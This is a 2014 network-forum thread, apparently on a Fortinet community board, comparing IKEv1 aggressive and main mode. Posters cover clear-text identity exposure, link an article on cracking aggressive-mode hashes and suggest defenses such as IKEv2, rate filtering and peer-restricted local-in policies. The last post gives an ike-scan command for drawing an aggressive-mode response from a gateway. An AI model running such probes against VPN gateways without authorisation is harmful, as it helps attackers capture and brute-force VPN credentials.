aggressive mode vs main mode

dirkdigs · ‎09-22-2014

how secure is aggressive mode. i know its faster then main mode with less exchanges but what does it send in clear text. is this a security issue?.

emnoc · ‎09-22-2014

It' s not as secured for IKEv1. Authentication parameters are leaked unencryted and with 3 exchanges vrs 6 for main-mode, btw you should be using it ( aggressive) for dialup or dyn vpns. fwiw, IKEv2 doesn' t have these issues.

PCNSE

NSE

StrongSwan

dirkdigs · ‎09-22-2014

so the key exchanges are not encrypted what about user login / password? is this still encrypted with aggressive mode? how do i secure my dialup vpn?

Istvan_Takacs_FTNT · ‎09-22-2014

C' mon man, if you really are FCNSP certified than you should know the answer to this basic question without asking it on a public forum. Seems it was really time to reform the certification path as it appears it starts to get diluted, and it could end up like the MCSE one that could be bought at the local fishmonger for $5 on its final days. BTW, the answer to your question can also be found after a quick look at the product documentation: Choosing main mode or aggressive mode http://docs-legacy.fortinet.com/fos50hlp/50/index.html#page/FortiOS%205.0%20Help/phase1.111.04.html

dirkdigs · ‎09-22-2014

found the answer. http://blog.spiderlabs.com/2013/03/cracking-ike-aggressive-mode-hashes-part-1.html @Istvan thanks for your dumb comment

emnoc · ‎09-23-2014

Ivstan that was harsh and probably most security engineer regardless of FCNSP status would not the difference of the two or even what quick-mode. Dirkdigs, I have never seen aggressive used outside of dialup vpns, where you can' t readily define the peer-address since it' s dynamic or an " any" ( 0.0.0.0/0 ) IKEv2 is a better choice all around but might be limited by vpn client support.

PCNSE

NSE

StrongSwan

ede_pfau · ‎09-23-2014

I agree that we all are not around these forums here to get bashed because of asking. Let' s just keep to the polite and informative style that this place is special for. Besides, I don' t even have a FCNSP certification and still just don' t know so many things though I' ve got 10 years experience with Fortinet now. I' m glad I have a place where I can ask fellow colleagues for advice. @dirkdigs I _did_ know that the IDs were exchanged in clear text when using AgMode but the blog you refered to was interesting and showing me something new. Namely, that one can brute-force an IPsec VPN, more easily with AgMode, and how. So, having the log flooded with unsuccessful attempts to establish a tunnel should ring the alarm bells. The new improved IPS rate filters of FOS 5.2 come to my mind.

Ede

"Kernel panic: Aiee, killing interrupt handler!"

Christopher_McMullan · ‎09-23-2014

Good article. I love networking: you' re always learning something new! A good way to prevent unauthorized attempts, if you are deploying a site-to-site VPN, is to create a local-in policy denying any UDP port 500 traffic into your local external interface (the one terminating the VPN) unless it comes from the known public IP of the VPN peer. config firewall local-in-policy edit 0 set ... ... end

Regards, Chris McMullan Fortinet Ottawa

dirkdigs · ‎09-23-2014

so is it possible to even get a response back form the fortigate using the ike-scan utility ? the article talks about Cisco ASA however i have not been successful trying this on the fortigate.

netmin · ‎09-23-2014

Yes, it is. Try using locally " diag debug application ike -1" to see what the FGT sees (but might not respond to). For example, a command like " ike-scan -A -g 5 <IP>" returns some information when DH group 5 is used and aggressive mode.